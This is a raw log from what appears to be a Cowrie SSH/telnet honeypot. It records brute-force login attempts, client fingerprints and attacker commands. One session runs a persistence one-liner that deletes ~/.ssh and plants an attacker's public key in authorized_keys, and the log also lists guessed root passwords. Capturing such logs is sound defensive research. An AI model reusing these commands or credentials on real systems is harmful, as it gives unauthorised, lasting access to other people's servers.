{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T01:27:39.989494Z","src_ip":"117.216.211.19","session":"41e7bbd2bb86"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:27:41.156451Z","src_ip":"117.216.211.19","session":"41e7bbd2bb86"}
{"eventid":"cowrie.session.connect","src_ip":"117.216.211.19","src_port":47586,"dst_ip":"1.2.3.4","dst_port":22,"session":"b30bd768c659","protocol":"ssh","message":"New connection: 117.216.211.19:47586 (1.2.3.4:22) [session: b30bd768c659]","sensor":"my-vps","timestamp":"2025-08-26T01:27:41.319499Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:27:41.320149Z","src_ip":"117.216.211.19","session":"b30bd768c659"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:27:41.484075Z","src_ip":"117.216.211.19","session":"b30bd768c659"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:27:42.181555Z","src_ip":"117.216.211.19","session":"b30bd768c659"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:27:42.346551Z","src_ip":"117.216.211.19","session":"b30bd768c659"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:27:42.348408Z","src_ip":"117.216.211.19","session":"dd4f13f2dc3c"}
{"eventid":"cowrie.session.closed","duration":12.750149726867676,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:27:47.857340Z","src_ip":"212.227.235.229","session":"2cc76ae75813"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":11662,"dst_ip":"1.2.3.4","dst_port":23,"session":"11f102c5c910","protocol":"telnet","message":"New connection: 212.227.235.229:11662 (1.2.3.4:23) [session: 11f102c5c910]","sensor":"my-vps","timestamp":"2025-08-26T01:27:48.174021Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33666,"dst_ip":"1.2.3.4","dst_port":22,"session":"62e505c0b74a","protocol":"ssh","message":"New connection: 212.227.125.160:33666 (1.2.3.4:22) [session: 62e505c0b74a]","sensor":"my-vps","timestamp":"2025-08-26T01:27:59.573965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:27:59.575159Z","src_ip":"212.227.125.160","session":"62e505c0b74a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:27:59.634987Z","src_ip":"212.227.125.160","session":"62e505c0b74a"}
{"eventid":"cowrie.login.failed","username":"solana","password":"solana123","message":"login attempt [solana/solana123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:27:59.817312Z","src_ip":"212.227.125.160","session":"62e505c0b74a"}
{"eventid":"cowrie.session.closed","duration":12.70006799697876,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:28:00.874018Z","src_ip":"212.227.235.229","session":"11f102c5c910"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:28:00.878721Z","src_ip":"212.227.125.160","session":"62e505c0b74a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":21755,"dst_ip":"1.2.3.4","dst_port":23,"session":"cc11219fed6e","protocol":"telnet","message":"New connection: 212.227.235.229:21755 (1.2.3.4:23) [session: cc11219fed6e]","sensor":"my-vps","timestamp":"2025-08-26T01:28:01.159036Z"}
{"eventid":"cowrie.session.closed","duration":12.651060342788696,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:28:13.810011Z","src_ip":"212.227.235.229","session":"cc11219fed6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":16772,"dst_ip":"1.2.3.4","dst_port":23,"session":"32c9ad648015","protocol":"telnet","message":"New connection: 212.227.235.229:16772 (1.2.3.4:23) [session: 32c9ad648015]","sensor":"my-vps","timestamp":"2025-08-26T01:28:14.103983Z"}
{"eventid":"cowrie.session.closed","duration":12.74954605102539,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:28:26.853443Z","src_ip":"212.227.235.229","session":"32c9ad648015"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43604,"dst_ip":"1.2.3.4","dst_port":23,"session":"9363d3bf450d","protocol":"telnet","message":"New connection: 212.227.235.229:43604 (1.2.3.4:23) [session: 9363d3bf450d]","sensor":"my-vps","timestamp":"2025-08-26T01:28:27.108799Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39324,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bae2a12bd7a","protocol":"ssh","message":"New connection: 212.227.125.160:39324 (1.2.3.4:22) [session: 4bae2a12bd7a]","sensor":"my-vps","timestamp":"2025-08-26T01:28:33.368965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:28:33.369943Z","src_ip":"212.227.125.160","session":"4bae2a12bd7a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:28:33.420246Z","src_ip":"212.227.125.160","session":"4bae2a12bd7a"}
{"eventid":"cowrie.login.success","username":"root","password":"eve","message":"login attempt [root/eve] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:28:33.572491Z","src_ip":"212.227.125.160","session":"4bae2a12bd7a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:28:33.735787Z","src_ip":"212.227.125.160","session":"4bae2a12bd7a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T01:28:33.736511Z","src_ip":"212.227.125.160","session":"4bae2a12bd7a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:28:33.788365Z","src_ip":"212.227.125.160","session":"4bae2a12bd7a"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:28:33.789580Z","src_ip":"212.227.125.160","session":"4bae2a12bd7a"}
{"eventid":"cowrie.session.closed","duration":12.748912572860718,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:28:39.857610Z","src_ip":"212.227.235.229","session":"9363d3bf450d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":17308,"dst_ip":"1.2.3.4","dst_port":23,"session":"6ba20bfe2159","protocol":"telnet","message":"New connection: 212.227.235.229:17308 (1.2.3.4:23) [session: 6ba20bfe2159]","sensor":"my-vps","timestamp":"2025-08-26T01:28:40.161554Z"}
{"eventid":"cowrie.session.closed","duration":12.651799440383911,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:28:52.813279Z","src_ip":"212.227.235.229","session":"6ba20bfe2159"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":4028,"dst_ip":"1.2.3.4","dst_port":23,"session":"f0329007d028","protocol":"telnet","message":"New connection: 212.227.235.229:4028 (1.2.3.4:23) [session: f0329007d028]","sensor":"my-vps","timestamp":"2025-08-26T01:28:53.104293Z"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":37770,"dst_ip":"1.2.3.4","dst_port":22,"session":"f55440abeab3","protocol":"ssh","message":"New connection: 27.112.78.170:37770 (1.2.3.4:22) [session: f55440abeab3]","sensor":"my-vps","timestamp":"2025-08-26T01:28:55.217246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:28:55.218040Z","src_ip":"27.112.78.170","session":"f55440abeab3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:28:55.478453Z","src_ip":"27.112.78.170","session":"f55440abeab3"}
{"eventid":"cowrie.login.failed","username":"zy","password":"123456","message":"login attempt [zy/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T01:28:56.566451Z","src_ip":"27.112.78.170","session":"f55440abeab3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:28:57.829417Z","src_ip":"27.112.78.170","session":"f55440abeab3"}
{"eventid":"cowrie.session.closed","duration":12.69982361793518,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:29:05.804029Z","src_ip":"212.227.235.229","session":"f0329007d028"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27868,"dst_ip":"1.2.3.4","dst_port":23,"session":"27dab638b327","protocol":"telnet","message":"New connection: 212.227.235.229:27868 (1.2.3.4:23) [session: 27dab638b327]","sensor":"my-vps","timestamp":"2025-08-26T01:29:06.112888Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:29:18.306314Z","src_ip":"212.227.235.229","session":"ff7387054ac4"}
{"eventid":"cowrie.session.closed","duration":180.26752972602844,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:29:18.311301Z","src_ip":"212.227.235.229","session":"ff7387054ac4"}
{"eventid":"cowrie.session.closed","duration":12.70058560371399,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:29:18.813409Z","src_ip":"212.227.235.229","session":"27dab638b327"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36701,"dst_ip":"1.2.3.4","dst_port":23,"session":"562bcf909719","protocol":"telnet","message":"New connection: 212.227.235.229:36701 (1.2.3.4:23) [session: 562bcf909719]","sensor":"my-vps","timestamp":"2025-08-26T01:29:19.162620Z"}
{"eventid":"cowrie.session.closed","duration":12.652939319610596,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:29:31.815487Z","src_ip":"212.227.235.229","session":"562bcf909719"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":15802,"dst_ip":"1.2.3.4","dst_port":23,"session":"369dbccd24db","protocol":"telnet","message":"New connection: 212.227.235.229:15802 (1.2.3.4:23) [session: 369dbccd24db]","sensor":"my-vps","timestamp":"2025-08-26T01:29:32.065459Z"}
{"eventid":"cowrie.session.closed","duration":12.749972581863403,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:29:44.815359Z","src_ip":"212.227.235.229","session":"369dbccd24db"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60158,"dst_ip":"1.2.3.4","dst_port":22,"session":"b665a74a62fd","protocol":"ssh","message":"New connection: 217.72.205.35:60158 (1.2.3.4:22) [session: b665a74a62fd]","sensor":"my-vps","timestamp":"2025-08-26T01:29:49.518255Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:29:49.520661Z","src_ip":"217.72.205.35","session":"b665a74a62fd"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":59672,"dst_ip":"1.2.3.4","dst_port":22,"session":"763c5de66bef","protocol":"ssh","message":"New connection: 27.112.78.170:59672 (1.2.3.4:22) [session: 763c5de66bef]","sensor":"my-vps","timestamp":"2025-08-26T01:30:23.940719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:30:23.945565Z","src_ip":"27.112.78.170","session":"763c5de66bef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:30:24.213844Z","src_ip":"27.112.78.170","session":"763c5de66bef"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456789..","message":"login attempt [root/Aa123456789..] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:30:25.332005Z","src_ip":"27.112.78.170","session":"763c5de66bef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:30:25.889402Z","src_ip":"27.112.78.170","session":"763c5de66bef"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:30:25.890221Z","src_ip":"27.112.78.170","session":"763c5de66bef"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T01:30:25.891596Z","src_ip":"27.112.78.170","session":"763c5de66bef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:30:26.161577Z","src_ip":"27.112.78.170","session":"763c5de66bef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:30:26.797748Z","src_ip":"27.112.78.170","session":"763c5de66bef"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T01:30:26.798465Z","src_ip":"27.112.78.170","session":"763c5de66bef"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T01:30:27.074596Z","src_ip":"27.112.78.170","session":"763c5de66bef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:30:27.075558Z","src_ip":"27.112.78.170","session":"763c5de66bef"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":43220,"dst_ip":"1.2.3.4","dst_port":22,"session":"c28b1e4ffd8e","protocol":"ssh","message":"New connection: 27.112.78.170:43220 (1.2.3.4:22) [session: c28b1e4ffd8e]","sensor":"my-vps","timestamp":"2025-08-26T01:30:33.339825Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:30:33.340520Z","src_ip":"27.112.78.170","session":"c28b1e4ffd8e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:30:33.605475Z","src_ip":"27.112.78.170","session":"c28b1e4ffd8e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:30:34.704204Z","src_ip":"27.112.78.170","session":"c28b1e4ffd8e"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:30:34.968804Z","src_ip":"27.112.78.170","session":"763c5de66bef"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:30:34.970053Z","src_ip":"27.112.78.170","session":"c28b1e4ffd8e"}
